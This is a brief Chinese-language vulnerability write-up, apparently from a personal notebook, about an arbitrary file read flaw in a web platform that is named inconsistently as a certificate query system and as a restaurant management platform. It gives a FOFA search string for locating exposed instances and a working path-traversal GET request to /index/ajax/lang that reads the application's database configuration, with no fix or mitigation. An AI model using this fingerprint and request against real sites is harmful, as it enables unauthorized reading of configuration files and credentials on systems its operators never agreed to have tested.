# 证书查询系统存在任意文件读取漏洞

# 一、漏洞简介
证书查询系统存在任意文件读取漏洞

# 二、影响版本
+ 餐厅数字化综合管理平台

# 三、资产测绘
+ fofa`"/index/js/jquery.uls.data.js'"`

![1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37.png](./img/RJ349Ot7eGo3wrZl/1722352904056-06c70fd3-31e8-4d32-8012-4ad428356e37-929281.png)

# 四、漏洞复现
```java
GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
```

![1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7.png](./img/RJ349Ot7eGo3wrZl/1722352933489-540436b5-cdf7-4ec0-8c66-5b946f3fe4c7-454699.png)



> 更新: 2024-08-12 17:15:58  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kw3y9u4xck897gu2>